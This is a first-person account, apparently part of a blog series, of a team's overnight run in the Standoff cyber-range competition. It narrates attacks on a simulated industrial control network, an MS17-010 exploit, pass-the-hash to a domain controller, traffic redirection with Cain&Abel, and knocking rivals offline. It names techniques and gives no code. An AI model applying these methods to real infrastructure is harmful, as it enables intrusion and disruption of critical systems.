Some of the team members have to leave for the night. By midnight we are down to 9 people. Productivity falls to near zero. Every hour we get up to splash our faces with water and to go outside to get some air, just to shake off the sleepiness.
Now, at last, we are getting to the Automated Process Control Systems (APCS)
02.00
The last few hours have been very discouraging. We have found several vectors, but they are already closed. We cannot tell whether they were closed to start with or whether TSARKA has already been here. Slowly studying the APCS, we and find a vulnerable NetBus controller. We use a metasploit module that we do not entirely understand how it works. Suddenly, the lights in the city go off. Organizers announce that they will count this in if we can turn the light back on. At that moment, our VPN goes down. The server managing the VPN was taken over by TSARKA! It looks like we were discussing the APCS too loudly and they managed to take over.
03.30
Even the most dedicated of us are starting to nod off. Only 7 are still working. Suddenly, without any explanation, the VPN is back on. We quickly repeat the trick with the city lights, and we see our balance going up by 200,000 points!!!
One part of the team is still looking for additional vectors, while another is working on the APCS. There we find two additional vulnerabilities. One of them we are able to exploit. But the outcome of the exploit could be a rewrite of the firmware of the microcontroller. We discuss this with the organizers and decide that we will wait for the rest of our team to rejoin us in the morning and then decide collectively what to do.
05:30
Our VPN works about 10 minutes every hour, and then it disconnects again. Within that time, we try to work. But the productivity is near zero. Eventually, we decide to take one hour each to nap. Spoiler alert — bad idea!
5 people are still working on the APCS.
MORNING
In the morning we suddenly realize that we are ahead of other teams by almost 1 million points. TSARKA was able to turn in two flags from APCS, plus a several flags from the telecom provider and the bigbrogroup. Also, they have miners working, and they must have some crypto that they have not turned in yet. We estimated that they had a minimum of 200-300 thousand more points in crypto. This is unnerving. We have a feeling that they might have a few more flags that they are strategically holding back until the final hours. But our team is coming back online. The morning sound check on the main arena is a little annoying but does chases the sleep away.
We are still working on trying to break into the APCS, but the hope is dimming. The difference in the points between the first and the second team and the rest of the teams is gigantic. We are worrying that the organizers might decide to throw in a few more «surprises» to shake things up.
After having a joined press-conference with TSARKA on the main arena we decide to change our strategy from «get more flags» to «prevent TSARKA from turning in more flags.»
On one of our servers, we fire up Cain&Abel and redirect all traffic to our server. We find some VPNs from Kazakhstan and kill them. Then we decide to kill all traffic everywhere, so we create a local firewall on the VPN channel to drop all traffic within the APCS network. This is how you protect an APCS! The organizers are now complaining that they lost connection to the APCS. We open access for their IP addresses (this is NOT how you protect the APCS).
12:47
We were right to worry about the organizers trying to shake things up. Out of nowhere, there is a data dump containing 4 logins for each domain. We mobilize the entire team.
Objectives:
Team 1: immediately take over all protected segments.
Team 2: use Outlook Web Access to change all passwords to the logins.
Some blue teams, sensing a lot of activity, simply turn off the VPN. Others are more tricksy and change the system language to Chinese. Technically, the service is still up! But of course, in practice, it is not usable (organizers, pay attention!). Via VPN we are able to connect to 3 of the networks. In one of them, we only last 1 minute before being kicked out.
12:52
We locate a behealthy server with the MS17-010 vulnerability (supposedly a protected segment?). We exploit it quickly, encountering no resistance. We obtain the hash of the domain admin and via Pth we access the domain controller. And guess what do we find there? Reversible encryption!
Whoever was protecting that segment has not done their homework. We collect all the flags, except for the part related to 1C. There is a good chance we could get it if we spent another 30-40 minutes there, but we decide to simply turn off the behealthy domain controller. Who needs competition?
13:20
We turn in our flags. We now have 2,900,000 points, plus a few outstanding bug bounties. TSARKA has a little over 1 million. They turn in their cryptocurrency and get another 200,000. We are now pretty sure they won’t be able to catch up, it would be almost impossible.
13:55
People are coming up and congratulating us. We are still worried about some surprise from the organizers, but it looks like we are really being announced as the winners!
This is the chronicle of the 28 hours of True0xA3. Of course, I left out a lot. For example, the press conferences on the arena, the torture that were the Wifi and the GSM, the interaction with the reporters… but I hope I captured the most interesting moments.
This was one of the most elevating experience for our team, and I hope that I was able to give you at least a little bit of a sense of what the atmosphere of the Standoff feels like, and to entice you to try to participate, too!
Next, I will publish the last part of this series, where I will analyze our mistakes and the ways to remediate them in the future. Because learning on someone else's mistakes is the best type of learning, right?